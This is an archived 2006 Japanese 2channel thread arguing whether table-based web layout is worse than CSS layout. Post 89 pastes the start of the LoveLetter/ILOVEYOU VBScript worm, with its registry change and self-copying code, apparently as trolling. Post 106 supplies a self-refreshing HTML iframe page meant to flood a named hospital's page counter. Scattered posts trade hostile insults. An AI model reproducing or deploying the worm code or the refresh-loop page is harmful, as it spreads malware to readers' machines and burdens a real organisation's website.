5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【td】テーブルレイアウトの何が悪いん? 4 【/td】

1 :Name_Not_Found:2006/04/28(金) 00:45:08 ID:otJSy6yP
歴史は繰り返す。





最終総結論。テーブルレイアウトは悪くない。完結。THE END.
      ttp://www.tagindex.com/statistics/q001/index.html








2 :Name_Not_Found:2006/04/28(金) 00:50:27 ID:wDbr7fcR
華麗に2げっと
超余裕の2げっと

3 :Name_Not_Found:2006/04/28(金) 00:51:09 ID:wDbr7fcR
ファイナルファンタジーみたいだな

4 :Name_Not_Found:2006/04/28(金) 00:51:33 ID:???
とりあえず、

<table><tr><td>
<h1>タイトル</h1>
<p>本文</p>
</td></tr></table>

みたいにテーブル内にブロック要素を含めるんじゃなくて、

<table><tr><td>
<span class="h1">タイトル</span>
<span class="p">本文</span>
</td></tr></table>

ってやれば何の問題もないんじゃないのか?

5 :Name_Not_Found:2006/04/28(金) 00:53:32 ID:wDbr7fcR




〜++ The End Table Layout ++〜





6 :前スレ1000:2006/04/28(金) 00:58:58 ID:???
ヘッヘー!
最後に書きたいこと書けたからいいもんねーっ☆

7 :Name_Not_Found:2006/04/28(金) 01:01:47 ID:???

やっぱテーブルっていいよね☆ ビルダー最高!

8 :前スレ1000:2006/04/28(金) 01:01:47 ID:???
というか…
http://www.tagindex.com/statistics/tag_name/

こんな程度の奴等が投票した奴の結果なんて信用できないよ。
ちょっとワラタ...

9 :Name_Not_Found:2006/04/28(金) 01:06:50 ID:???
>>7
俺もびるだ使ってるよ!
いいよねーテーブルだと作りやすくてさー

10 :Name_Not_Found:2006/04/28(金) 01:09:08 ID:???
>こんな程度の奴等が

いいねぇこの見下した感じ
8の誰も相手にされてない人間性が出ててちょとワラタw

11 :Name_Not_Found:2006/04/28(金) 01:14:34 ID:???
DWでテーブルレイアウト組むのも乙なものだぜ。Fireworksを組みあわせてウマー!!

12 :Name_Not_Found:2006/04/28(金) 01:43:21 ID:???
【td】テーブルレイアウトの何が悪いん? 4 【/td】
http://pc7.2ch.net/test/read.cgi/jisaku/1146152902/

13 :Name_Not_Found:2006/04/28(金) 04:35:26 ID:???
>>4
tableのセル内にブロック要素を含む事は元々問題ないはず。

14 :Name_Not_Found:2006/04/28(金) 04:53:49 ID:???
テーブルレイアウトのリキッド
CSSレイアウトのソリッド

どっちが上?

15 :Name_Not_Found:2006/04/28(金) 09:57:34 ID:???
CSS派からテーブル派に戻ってきますた。
人はいずれtableに帰る。

16 :Name_Not_Found:2006/04/28(金) 14:38:52 ID:???
CSSはブラウザ間の解釈の違いがうざったい。

17 :Name_Not_Found:2006/04/28(金) 15:20:25 ID:C1+Erf/b
tdはタグだからな
cssはタグじゃないからな

tdで十分

18 :Name_Not_Found:2006/04/28(金) 16:18:06 ID:???
両方のいいところを理解して使えるヤツは一人前
どっちがいいとかほざくヤツは半人前


ぐだぐだいうまえに勉強しろ

19 :Name_Not_Found:2006/04/28(金) 18:04:49 ID:???
(´-`).。oO人はTABLEにもどってくるんだよ。
ttp://pc8.2ch.net/test/read.cgi/hp/1133608232/

大枠はtableで、細かいところはCSS使ってる。

20 :Name_Not_Found:2006/04/29(土) 02:01:20 ID:6GhwTq9A
>>1

早い話、今国会で「CSS禁止法」「テーブル義務指定法」を提出しろってことか?


21 :Name_Not_Found:2006/04/29(土) 05:16:21 ID:???
>>18
いいところもなにも適切にマークアップするのがおとな。
テーブルは表。

22 :Name_Not_Found:2006/04/29(土) 05:22:24 ID:???
見る側からしたらテーブルでもCSSでもいいんだよな。
どのブザウザからでも同じように見られて、極度に重かったりしなければ。
テーブルレイアウトだと、HTML初心者でも直感的にデザインできるからいいんじゃねーの。
自分じゃやらないけど、だからって他所のサイト見るとき
テーブルレイアウトかどうかなんて気にしない。

23 :22:2006/04/29(土) 05:23:26 ID:???
うはwブザウザってなにwww
分かると思うけど ブラウザ です

24 :Name_Not_Found:2006/04/29(土) 08:06:05 ID:???
あーあ。馬鹿ばっかり。
表がナニだかがわからないんだろうな、きっと。

25 :Name_Not_Found:2006/04/29(土) 12:01:55 ID:???
なんだって? CSSを表に使えだと! おいおいしっかりしろやw>24

26 :Name_Not_Found:2006/04/29(土) 14:05:19 ID:???
CSS3になって初めて、レイアウト用の属性ができるんだよね?

27 :Name_Not_Found:2006/04/29(土) 14:11:30 ID:17DdVdBF
だったらCSSを禁止にしょうよ。

28 :Name_Not_Found:2006/04/29(土) 14:16:00 ID:???
ここは異常に文盲率高いなw


29 :Name_Not_Found:2006/04/29(土) 14:25:18 ID:???
全部テーブルで囲みこんだクソ重たいページでなきゃテーブルもアリかな


30 :Name_Not_Found:2006/04/29(土) 14:29:11 ID:???
論文とか掲載するページで適切なマークアップができてないのは困るが、
「その場で読んで終わり」なページならどうでもよい。
よほど重いか奇天烈なレイアウトになってない限りソース覗くこともないしね。
でも企業のページが今時テーブルレイアウトなのはどうかと思う。

31 :Name_Not_Found:2006/04/29(土) 15:32:44 ID:qP6tUWqd
cssを禁止にすればいいんだよ。

32 :Name_Not_Found:2006/04/29(土) 17:01:46 ID:???
音声ブラウザ相手も考えた公的サイトだと使えないぽ

33 :Name_Not_Found:2006/04/29(土) 18:57:04 ID:???
どうせ公的サイトはIE専用だから、どっちにしろ使えない

34 :Name_Not_Found:2006/04/29(土) 19:27:59 ID:/dyaksqT
CSS以外許さない人って頭が固いってことだよね
与えられたものを要領よく使いこなせないタイプなんだろうね

35 :Name_Not_Found:2006/04/29(土) 19:32:51 ID:???
要領よくだってw
馬鹿なだけなのに。

36 :Name_Not_Found:2006/04/29(土) 19:33:23 ID:???
時代遅れの古代人の集まりだなw

37 :Name_Not_Found:2006/04/29(土) 19:44:27 ID:6GhwTq9A
CCSを禁止にしてテーブルと各要素ごとにスタイル指定
を義務化すれば良い。



38 :Name_Not_Found:2006/04/29(土) 20:02:53 ID:???
>>30
>でも企業のページが今時テーブルレイアウトなのはどうかと思う。

多いね、企業で企業でテーブルレイアウト。

これは、とりあえずどんなブラウザでも崩れず見えるって事を重視したんだろうな。
文法的にどうかって事よりも。



39 :Name_Not_Found:2006/04/29(土) 20:13:48 ID:6GhwTq9A
W3Cはスルーか・・・。

40 :Name_Not_Found:2006/04/29(土) 21:19:00 ID:???
>>38
>どんなブザウザでも崩れない
氏ねよw

41 :Name_Not_Found:2006/04/29(土) 21:25:25 ID:K2EIJkTG
「どんなブラウザでも」ねえ。
「どんなブラウザでも」とか言う人に限ってメディアタイプがscreenのブラウザしか考えていない件。

42 :Name_Not_Found:2006/04/29(土) 21:33:52 ID:6e8QugK/
FWでスライスしたらテーブルになるよ

43 :Name_Not_Found:2006/04/29(土) 21:52:46 ID:???
テーブル厨は料理人で例えたら
フライパンでご飯を炊いているんですよ。

テーブル厨「火が通れば何でもいいじゃん」

44 :Name_Not_Found:2006/04/29(土) 22:02:12 ID:???
テーブル厨 == 漢の料理人

でFA?

45 :Name_Not_Found:2006/04/29(土) 22:25:30 ID:???
問題はその料理を他人が喰うことだ!

46 :Name_Not_Found:2006/04/29(土) 22:29:48 ID:???
まっとうにCSSを勧めている人はこんなスレには来ないよね
ここにいるテーブルを馬鹿にしているCSS厨は偽物のW3C厨クズればかり

47 :Name_Not_Found:2006/04/29(土) 22:44:55 ID:1um8Bp7+
テーブルレイアウトは、表示速度が遅い

まず、テーブルを読み込むから、1つにのテーブル全体にかかる表示速度が遅い

クライアントからのwaitが長くなる

しかし、表なので仕方がない

48 :Name_Not_Found:2006/04/29(土) 22:48:46 ID:???
テーブルレイアウトする香具師はCSSを使うなよww
テーブルだけでデザインしろww

49 :Name_Not_Found:2006/04/29(土) 22:50:54 ID:1um8Bp7+
>>48に対する返事をする意味がない

50 :Name_Not_Found:2006/04/29(土) 22:58:14 ID:???
なんだって? CSSを表に使えだと! おいおいしっかりしろやw>48

51 :Name_Not_Found:2006/04/29(土) 22:59:49 ID:???
>まず、テーブルを読み込むから、1つにのテーブル全体にかかる表示速度が遅い

自分の能力の無さを棚に上げて騙るなよw それはお前にテクニックが無いからだぜw

52 :Name_Not_Found:2006/04/29(土) 23:01:51 ID:???
なんか致命的なのが常駐してますな。

53 :前スレ1000:2006/04/29(土) 23:02:37 ID:???
ホントだ、無知晒しすぎ。

54 :Name_Not_Found:2006/04/29(土) 23:03:00 ID:???
今時テーブルレイアウト?
ダサくてお話にならない。

55 :Name_Not_Found:2006/04/29(土) 23:03:56 ID:???
>>53
6 :前スレ1000(sage):2006/04/28(金) 00:58:58 ID:???
ヘッヘー!
最後に書きたいこと書けたからいいもんねーっ☆


キモイのが一人いるなw

56 :Name_Not_Found:2006/04/29(土) 23:06:35 ID:???
キモイとか、そういうのって文脈だけで判断出来ないだろ。

57 :Name_Not_Found:2006/04/29(土) 23:07:25 ID:???
6=53=65 = キ モ イ

58 :Name_Not_Found:2006/04/29(土) 23:08:30 ID:???
前スレ1000=6=53=56 = キ モ イ

文脈だけで判断してみました

59 :Name_Not_Found:2006/04/29(土) 23:08:37 ID:???
>>57
未来アンカー キタコレ!!

60 :Name_Not_Found:2006/04/29(土) 23:09:45 ID:???
前スレ1000=6=53=56=59 = キ モ イ


揚げ足とって勝ち誇り 楽しいよねw 俺もお前の意見に賛成だw

61 :Name_Not_Found:2006/04/29(土) 23:09:58 ID:???
>>57
なんでそんな必死なんだ?
というかお前もイコールでつなげるぞww

頼んだぞ>>65

62 :Name_Not_Found:2006/04/29(土) 23:10:35 ID:???
60の特徴: スペースが全角

全角厨だ('A`)

63 :Name_Not_Found:2006/04/29(土) 23:10:42 ID:???
>>61
なんでそんな必死なんだ?w

64 :Name_Not_Found:2006/04/29(土) 23:11:20 ID:???
>>63
つ 【鏡】

65 :前スレ1000:2006/04/29(土) 23:11:23 ID:???
死ね!>62

66 :前スレ1000:2006/04/29(土) 23:13:08 ID:???
お前ら皆死ね!

67 :Name_Not_Found:2006/04/29(土) 23:13:54 ID:???
>>66
ボケ!お前が死ね!

68 :Name_Not_Found:2006/04/29(土) 23:15:03 ID:???
6 :前スレ1000(sage):2006/04/28(金) 00:58:58 ID:???
ヘッヘー!
最後に書きたいこと書けたからいいもんねーっ☆


キモイのが一人いるよw

69 :Name_Not_Found:2006/04/29(土) 23:15:17 ID:???
春の陽気に頭をやられた哀れな子羊の集まるトコはここですか

70 :Name_Not_Found:2006/04/29(土) 23:15:52 ID:???
お前な>69

71 :Name_Not_Found:2006/04/29(土) 23:16:50 ID:???
60の特徴: スペースが全角

全角厨だ('A`)

72 :Name_Not_Found:2006/04/29(土) 23:26:05 ID:???
どうやら前スレの1000とかいう奴が一人で騒いでいるスレだな

73 :Name_Not_Found:2006/04/29(土) 23:33:32 ID:???
>>72
え?

74 :Name_Not_Found:2006/04/29(土) 23:43:34 ID:???
>>73
またお前か!前スレの1000!スレ汚しもいい加減にしろ!

75 :Name_Not_Found:2006/04/30(日) 00:12:11 ID:???
>>74
は?

76 :Name_Not_Found:2006/04/30(日) 00:12:53 ID:???
テーブル厨、CSS厨へ告ぐ
http://pc8.2ch.net/test/read.cgi/hp/1146319579/

77 :Name_Not_Found:2006/04/30(日) 00:17:42 ID:???
またお前か!前スレの1000!スレ汚しもいい加減にしろ!

78 :Name_Not_Found:2006/04/30(日) 00:37:20 ID:???
ずいぶんスレが伸びてると思ったら
ひどく不毛な言い争いだな

79 :Name_Not_Found:2006/04/30(日) 02:45:23 ID:???
CSSのfloatやposition使えばすむ話じゃん。

80 :Name_Not_Found:2006/04/30(日) 03:00:19 ID:???
テーブルは表に使うんだと意識し始めたら
代わりに多く使うようになったのはDLとDIVだな。
DIVはほぼデザイン目的だが。

81 :Name_Not_Found:2006/04/30(日) 03:58:09 ID:eYC9Vm7h
DIV厨が来マスタ

82 :Name_Not_Found:2006/04/30(日) 04:05:23 ID:???
あとはこれにSPAN厨、W3C厨とFLASH厨、テキスト厨、全て画像でいい厨、そしてAJAX厨が来れば完成だ! って何が?

83 :Name_Not_Found:2006/04/30(日) 04:07:24 ID:eYC9Vm7h
あとはこれにSPAN厨、W3C厨とFLASH厨、テキスト厨、全て画像でいい厨、そしてAJAX厨が来れば完成だ!
あとはこれにSPAN厨、W3C厨とFLASH厨、テキスト厨、全て画像でいい厨、そしてAJAX厨が来れば完成だ!
あとはこれにSPAN厨、W3C厨とFLASH厨、テキスト厨、全て画像でいい厨、そしてAJAX厨が来れば完成だ!

って、早口で3回言えたらすごい

84 :Name_Not_Found:2006/04/30(日) 05:31:46 ID:???
で、このスレは何を話すとこなんだ?

85 :Name_Not_Found:2006/04/30(日) 15:42:17 ID:???
>>1が自己完結してるから特にない

86 :Name_Not_Found:2006/04/30(日) 16:32:23 ID:???
そうか。それじゃもう行くわ。

87 :Name_Not_Found:2006/05/02(火) 14:16:37 ID:???
tableは表を作るためのものだというのは分かる
一方でCSSレイアウトのためにdiv厨になっているのが馬鹿げているとか
各環境の表示誤差が大きすぎて仕事にならんというのも分かる

tableに代わり、同じように使えるレイアウト用のタグが出来たりしないものか
で、その新タグの各領域(tableでいうtd)にテキストブラウザとか
スパイダーに示す読み込みの順序を示す事が出来ればベスト

88 :Name_Not_Found:2006/05/02(火) 15:04:43 ID:???
カラムプロパティ?

89 :( ^ω^):2006/05/03(水) 20:51:20 ID:???
rem barok -loveletter(vbe)< i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy (dirwin&"\Win32DLL.vbs")
c.Copy (dirsystem& ;"\ LOVE-LETTER-FOR-YOU.TXT.vbs ")
regruns()
html()

90 :Name_Not_Found:2006/05/05(金) 07:54:14 ID:???
>>89
凸('A`メ)

91 :Name_Not_Found:2006/05/05(金) 22:04:59 ID:LSk3VpYW
なんで、4が建ってんの?

92 :Name_Not_Found:2006/05/05(金) 23:54:19 ID:???
>>89

マカーなおいらには関係なし…
いまさらLoveLetterウィルスでもないとは思うけど…
でも、これって犯罪じゃないの?

ウィルスをバラまいてるんだよね?故意に?

93 :Name_Not_Found:2006/05/06(土) 03:27:37 ID:Dgzhekpm
スレ開いて先生が怒ったと思ったら>>89か・・。



94 :Name_Not_Found:2006/05/06(土) 03:39:50 ID:???
そのウィルスコード書いたの前スレの1000だよ

95 :Name_Not_Found:2006/05/06(土) 03:41:40 ID:???
ゴルア!!! 前スレの1000出てこい!!!!

96 :Name_Not_Found:2006/05/06(土) 07:47:09 ID:???
>>92
もうかなり2chで出回ってるが、そのコードだけではPC自体は無害だと思うよ。
単にノートンが誤作動しているだけ。

実行させたならわかるが、2chのスレ開いただけでは無害だよ。

97 :Name_Not_Found:2006/05/06(土) 08:10:30 ID:???

http://web.xii.jp/iec/note/table

しっかしさー、Webってレイアウトはしない方がいいと思わない?
閲覧者の解像度なんて一様じゃないじゃん。。。

98 :Name_Not_Found:2006/05/08(月) 05:52:10 ID:???
テーブルでレイアウトはしない。
でも、内容が本当に表ならtable使う。
反映差なんか気にしない。気にしても対応出来ない。

99 :Name_Not_Found:2006/06/08(木) 20:37:04 ID:???
てかぶっちゃけると、どのブラウザもテーブルタグ切捨てみたいな真似はできないだろうし
永遠に使い続けられると思うぜ

100 :Name_Not_Found:2006/06/09(金) 07:59:17 ID:???
>>97
テーブルレイアウトによって表示が一秒遅くなった文書を百回読込むと、百秒遅くなります。

はいはい100秒100秒

101 :Name_Not_Found:2006/06/10(土) 08:43:46 ID:???
そもそもテーブルレイアウトじゃなくても遅いものは遅いしな

102 :Name_Not_Found:2006/06/10(土) 10:44:57 ID:???
テーブルレイアウトで今、一番、何が問題になっているのでしょうか?

103 :Name_Not_Found:2006/06/10(土) 11:09:43 ID:???
>>102
テーブルは本来表に使うもの!
それ以外に使っても何も問題はないけど、本来の用途とは違うからよくないの!

と変な固定観念に囚われてる人が怒るぐらいかな

104 :Name_Not_Found:2006/06/16(金) 09:06:19 ID:???
↑そうそう
と、ageてみる。

105 :Name_Not_Found:2006/06/16(金) 11:47:01 ID:???
またお前か。前スレの1000。

106 :Name_Not_Found:2006/06/17(土) 08:39:08 ID:0PlI9Kr0
2ちゃんねらーで話題になった「愛生会病院HPのカウンターをつぶしませんか?
---------ここから-------
<HTML>
<HEAD>
<meta http-equiv="Refresh" content="0; url=./aiseikai.html">
</HEAD>
<BODY>
<IFRAME SRC="http://www.aiseikai.or.jp/documents/title/title1.htm"></IFRAME><BR>
</BODY>
</HTML>
---------ここまで-------
をファイル名、aiseikai.htmlでデスクトップに保存して、Webブラウザに読み込むだけ。


107 :Name_Not_Found:2006/06/18(日) 16:38:44 ID:???
何が悪いって標準で作ったページを古い人間が勝手にテブること

108 :Name_Not_Found:2006/06/18(日) 19:49:33 ID:???
またお前か。前スレの1000。

109 :table祭り!テーブルサイト1996-2005:2006/09/06(水) 17:07:33 ID:???
table祭り!テーブルサイト1996-2005

tableで作る容量の多いサイトを紹介して下さい。
スタイルシートのサイト紹介があるので、
逆に懐かしの(古いサイト)を紹介してみましやう

【紹介例】

・Web創生期にあった垂直のページ。
※CSSサイトでCSS適応されてない状態は不可。
・フレームサイト
・画像のオンパレードサイト
(Altなし、スライスしたimgパーツ全部をHTML化にした状態)
・未だにBBSの表記があるページ。
・「WebSite」でなく「HP」と表記のあるもの
・ビルダーで作成したと思われるサイト
・ソースが大文字だった
・レイアウトはtable、装飾を要素に記入したもの

どれくらいあるんでしょうか?

■参考資料:
【td】テーブルレイアウトの何が悪いん? 4 【/td】
http://pc8.2ch.net/test/read.cgi/hp/1146152708/

110 :Name_Not_Found:2006/09/07(木) 13:55:39 ID:???
つーかさ、表現したいものの為に技術や手法があるんであって、
技術や手法に縛られて表現がおろそかになるのなら意味が無い。
なにより重要なのはウェブサイトという最終的な成果物。
いかに奇麗にコーディングされていようとも、
見づらいサイトは見る気がない。

111 :Name_Not_Found:2006/09/08(金) 16:10:31 ID:???
個人的にはテーブルだのValidだのこだわらなくて良いと思う。
和洋折衷みたいに良いところ取りをすれば良いじゃん、と。
あとはどこに目的・目標を置くかの違い。

俺は情報系サイトをやっているから
視覚障害者でも問題なく閲覧できるようにValidで書いてるわけだけど
(テーブルだと音声読み上げ式ブラウザは辛いからね)
例えば写真やイラスト系サイトのように
視覚障害者の閲覧を根本的に考えていないようなところでは
音声読み上げ式ブラウザのことを考える必要がないわけで。
そのようなサイトでは使いやすい方使えば良いじゃん。

・テーブルの方が簡単で優れてる
・いや、HTMLは論理的マークアップだけするものだ
という議論って本末転倒だなあと思うな。

112 :Name_Not_Found:2006/09/09(土) 02:07:09 ID:???
ピクセル単位でM$IE 6.0と全く同じ表示を、他のブラウザにもさせたい
という人がtableレイアウトに拘ってるんじゃないのかな?

実際そういう人って結構多いみたいよ、プロ・アマ問わずね。

113 :Name_Not_Found:2006/09/09(土) 02:31:04 ID:???
px単位で指定してくるやついるんだからしょうがないだろ
mm単位よりはましだが

114 :Name_Not_Found:2006/09/09(土) 20:03:17 ID:???
テーブルレイアウトは頭が悪い。

115 :Name_Not_Found:2006/09/17(日) 00:06:23 ID:???
>>114 そういう固定観念に囚われてるお前は頭が悪い。
まあ>>103の言うことがもっともかな。

116 :Name_Not_Found:2006/09/17(日) 01:06:13 ID:???
レイアウトはテーブルを使う方が便利だから、CSS3でカラムプロパティができるんじゃないの?
よく知らんけど。

117 :Name_Not_Found:2006/09/25(月) 16:57:37 ID:???
tableが表の事だって誰が決めたの?
tableはテーブルじゃないの?

118 :Name_Not_Found:2006/09/25(月) 17:16:35 ID:???
今市販ソフトで作るから、そこから変わらないとね。

119 :Name_Not_Found:2006/09/25(月) 18:57:09 ID:???
別にぶっちゃけ、閲覧側にとってはテーブルであろうがCSSであろうが関係ないし。
逆に現段階において、色々なブラウザ上CSSは完全なサポート化にないから、ユーザーがCSS切ったり、表示形式を作成者じゃなくユーザー優先にしていると表示が崩れることあるし。
とわいっても大抵の環境ではよほどのサポート外のCSSコマンド使わない限りだいたいはよいけれど。
CSSは作成者側の整理や再編集・修正のしやすさと、デザインの統一感を持たせるのに楽な面じゃない。
いまだにスライス切ってボタンやオーバー物作るときはテーブルが無難、というかスムーズだしな。

120 :Name_Not_Found:2006/09/25(月) 23:32:46 ID:Kk6iKaki
現実問題、統計はわからないけど関西の場合に限って言えば
WebはWeb専門会社が受注するよりも、DTP系が余興でWebを受注するケースが多く、
デザインもイラレやFireworksで先に作るので、コーダーの作業性を考えると
圧倒的にテーブルが多いのが現状。今のところCSSレイアウトはちゃんとした
Web専門の会社か(あまりない)、マニアの素人がガタガタ言ってる程度かも

121 :Name_Not_Found:2006/09/26(火) 00:26:14 ID:???
カレーよりもうんこがカレーっぽく見えればうんこで良い人達なんですよ。


122 :Name_Not_Found:2006/09/26(火) 00:52:47 ID:???
面白いたとえだな。

123 :Name_Not_Found:2006/09/26(火) 02:30:15 ID:???
要件定義で対称ブラウザに音声ブラウザが入ってなけりゃ
好きなほう使えばいい。
SEOやらはコンサルにまかせとけ。

ではダメなの?

124 :Name_Not_Found:2006/09/26(火) 03:22:23 ID:???
テーブルで囲んだ部分が部品化して、並べるだけになるんだよ。
ブログなんてもうそうじゃん。

125 :Name_Not_Found:2006/09/26(火) 03:46:09 ID:???
>>121のがウンコ脳

126 :Name_Not_Found:2006/09/26(火) 04:43:55 ID:???
うんこ食べてなさい。きみたち。

127 :Name_Not_Found:2006/09/26(火) 05:32:28 ID:???
ついでに連続BRもやりなさい。うんこ族。

128 :Name_Not_Found:2006/09/26(火) 05:47:29 ID:???
CSSは完全にwebデザを二分化したな。
一つはCSSの良いところを生かして、他の機能とうまく総合的に、サイトの内容にあったデザインをする、つまりデザインの幅がCSSで広がったユーザー。
もう一つは、CSSばかりに取り憑かれて、サイトの内容や伝えるべき物を見失ってしまったユーザー。
ページのデザイン性や閲覧層のことなど考えられず、ひたすら完璧なCSSコードのみを目指す。他のサイトもページそのものよりも裏のコードにしか気が向かない。
まるでCSSのダークサイドに呪われているよう。恐ろしい。


129 :ダース・ベイダー:2006/09/26(火) 06:03:01 ID:???
クススの暗黒面。。。
(Darkside of CSS)

130 :Name_Not_Found:2006/09/26(火) 20:04:56 ID:ijWzaqjM
CSSってほんとに使えねえよな。
W3Cも何でこんなできの悪い規格作っちまったんだろうな。

131 :Name_Not_Found:2006/09/26(火) 20:28:42 ID:???
W3C自体できが悪いもん

132 :Name_Not_Found:2006/09/26(火) 21:26:35 ID:???
論理構造を完全分離すれば、基本的文書内容は見られるんだからCSSはどうでもいいんでそ?

133 :Name_Not_Found:2006/09/27(水) 05:22:23 ID:???
テーブル派
CSS派
フルFLASH派

134 :Name_Not_Found:2006/09/27(水) 06:32:21 ID:???
>>133
おい忘れるな
つ画像1枚派

135 :Name_Not_Found:2006/09/27(水) 07:52:23 ID:Ss0NhEEb
>>134
ワロタw
田舎商店のHPに結構あるね

136 :Name_Not_Found:2006/09/27(水) 11:19:45 ID:???
何画像1枚派って?そんなのみたことない。
cssは使えなくはない。cssのほうが管理しやすいし、検索対策もよいし。
ただ、divを無必要に投下しまくってる糞ページは酷いな、結構cssを使いこなせないのに背伸びするとああいう酷い状態に。
cssはガチでどの環境でもサポートしてるコードを使ってきちんと作っていくと整然としたサイトになるし、デザインの幅も広がる。
テーブルも同じように、マス目レイアウトが生きるデザインなら全然使って問題ないじゃない。
どちらかに偏ってしまって、意固地になると無理に負秩序なサイトになるんじゃないかと。

137 :Name_Not_Found:2006/09/27(水) 12:52:50 ID:???
↓多い日も一枚派

138 :Name_Not_Found:2006/09/27(水) 12:54:50 ID:???
テーブル大魔神
http://www.ai21.net/bousai/zenkoku/index_a.html

139 :Name_Not_Found:2006/09/27(水) 13:09:39 ID:???
>>136
1枚絵のみで所々にアンカー貼るタイプだよ
ttp://jp.selfhtml.org/html/grafiken/anzeige/img_usemap.htm
こんな感じの

140 :Name_Not_Found:2006/09/27(水) 13:10:11 ID:???
>>134, >>136
画像一枚に見せかけて実はテーブルでスライスされてる罠。
本当にスライスレスで画像一枚はさすがに見たことないな。

スライスされた大きな画像もしくはイメージマップだけで構成し
それをテーブルで配置。
その為にどんなPC環境でもフォントの見栄えや配置がカッチリ決まる
というサイトなら、たまに見かけるけど。

141 :Name_Not_Found:2006/09/27(水) 13:14:06 ID:???
あのさ、このページさっきまでウイルスに反応して開けなかったんだけど、>>138かな?

142 :Name_Not_Found:2006/09/27(水) 13:25:20 ID:???
>>141
今、開くようになった原因は?

143 :Name_Not_Found:2006/09/27(水) 13:25:37 ID:???
>>141
いや。>>89にウィルスコードが貼られてる。
つか、いい加減専ブラ使って
ノートン先生の設定でログファイルを除外させろっての。

144 :Name_Not_Found:2006/09/27(水) 13:36:20 ID:???
>>138
これほどの入子構造になると清々しささえ感じるのはオレだけか?
見る分にはスッキリしてるが、ソースが・・・w

145 :Name_Not_Found:2006/09/27(水) 13:48:03 ID:???
>>140
日本WEBデザイナーズ協会のコンテストで賞もらった奴の作品が1枚絵だった
いまはフルフラッシュになってるんで実物はないのが残念だ


146 :Name_Not_Found:2006/09/27(水) 13:59:02 ID:???
>>140
映画サイトのティーザーとか一枚画像がよくある罠

147 :Name_Not_Found:2006/09/27(水) 14:13:17 ID:???
W3c=建設省
検索屋=ゼネコン

148 :Name_Not_Found:2006/09/27(水) 20:06:06 ID:???
テブル厨=姉歯

149 :Name_Not_Found:2006/09/27(水) 20:54:16 ID:???
>>148
確かにテブル厨=>>138は地震絡みだから姉歯に通じるものを感じるなw

150 :Name_Not_Found:2006/09/28(木) 01:12:49 ID:WmA3IVSc
見た目を追求するのか、それとも使いやすさか…。この両立は難しい。
どちらの要素も含むWEBサイトが理想である事は言うまでも無いが、
現状そうも言ってられない。

WEB関係者や、少々かじったヤツらの一部にCSSのみのレイアウトを
「強く押す」連中がいる。

いわゆる「ソースの構築美」にこだわるヤツらだ。

元からWEB畑の人間はまともなデザイン教育、感性を磨く行程を
経ていないのが現状。Html、Flash、Javascript、CSS、PHP、CGI……
これらを学ぶだけでも大変なのだからそれも致し方ない。

こういった連中は当然まともにデザインする術を知らないわけだから、
こだわる部分と言ったら、それらしかないのだろう…。
テーブル組みを否定したり、ソースのおかしな部分を否定する事で、
自らの存在を固辞しようとする。

逆を言えば紙媒体出身の人間はデザイン力には優れているが、WEBに関する
知識に乏しい。本格的に学ぶにしても、その時点で年齢的に遅かったり
もする。

現状の理想は「デザインが出来る」人間がデザインをして、その後で
専門の人間が構築する…。と言った所だろう。

もちろん今後デザイン力もWEBの知識も兼ね備えた人間が増える事が
望ましい。

結局私が何を言いたいのか…。お前らの論点はズレている。
何がしたいのか私には全く見えない。まずは己を見つめ直す事から
始めるといい…。語るのはその後だ。


151 :Name_Not_Found:2006/09/28(木) 01:29:15 ID:???
>>150
適材適所の4文字で済むだろうがバカ

152 :Name_Not_Found:2006/09/28(木) 01:31:56 ID:???
検索って道路だよね。本当。

153 :Name_Not_Found:2006/09/28(木) 02:21:27 ID:JKA/1LJc
>>150
紙媒体出身の人間は「紙媒体の」デザインに優れているというだけ。
奴らは自動車のデザインもできないしウェブのデザインもできない。

154 :Name_Not_Found:2006/09/28(木) 03:35:24 ID:???
なんで自動車が出てくるのよ。
紙にしてもなんでもCGに携わってきたやつと、にわかwebデザとでは次元が違いすぎ。

155 :Name_Not_Found:2006/09/28(木) 03:58:45 ID:???
>>154
典型

156 :Name_Not_Found:2006/09/28(木) 04:11:44 ID:???
webデザは7割がグラフィック、残りがhtmlやcssのコーディングだと思うの。
Flashはグラフィックデザインができるの前提だしー、素材が無ければ何も始まらない。

157 :Name_Not_Found:2006/09/28(木) 04:34:00 ID:???
もう紙出身の脳なし馬鹿たれ痴呆デザには
勤まらないほどWebは高度化してるよ

158 :Name_Not_Found:2006/09/28(木) 04:38:05 ID:???
普通は、bじゅある担当、コーディング担当と別れて作業するわな。
ニートには理解できんのかなその辺のワークフロー。
一番使い物にならないのは、ビジュアルデザインができないくせにjavascriptやphpもろくに操れない、htmlだけでその気になってるヤツ。

159 :Name_Not_Found:2006/09/28(木) 05:18:33 ID:???
結局、見映えとコンテンツの分離のメリットがいつまで立っても
あまり多く無い事と、IE6にdisplay:tableが実装されてない事が
cssデザインの普及に歯止めを掛けている。この件に関しては、
一体何年停滞しているやら……。

blogやcmsブームで多少は良くなったが、ajaxのブームでHTMLの質
(特にJavascript適用後のHTMLの質)は今後下がるはず。

160 :Name_Not_Found:2006/09/28(木) 05:26:57 ID:???
IEに関しては、css以外に透過pngがちゃんと表示できないのもなんとかならんかな。
cssで背景画像配置して、上に透明グラデボタンとか置けねーよ。

161 :Name_Not_Found:2006/09/28(木) 10:15:04 ID:yVnsDk8u
>>154
デザインとは設計。
システムを知らないものには設計できないと言いたかった。

162 :Name_Not_Found:2006/09/28(木) 11:21:37 ID:???
デザインはデザインだろ。
周り見てるとフォトショやイラレ、FWの達人はhtmlや他のコードも結構できると思う。
